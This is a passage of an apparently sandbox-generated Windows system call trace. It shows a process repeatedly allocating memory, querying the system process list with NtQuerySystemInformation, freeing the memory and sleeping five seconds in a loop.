ResultLength=0x0) returned 0xc0000004 [0229.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.777] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.785] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.792] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.798] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.805] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.812] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.819] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.826] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.835] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.842] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.850] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.858] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.862] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.866] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.866] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.876] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.880] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.886] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.893] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.899] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.906] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.913] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.957] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.965] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.967] NtAllocateVirtualMemory (in: 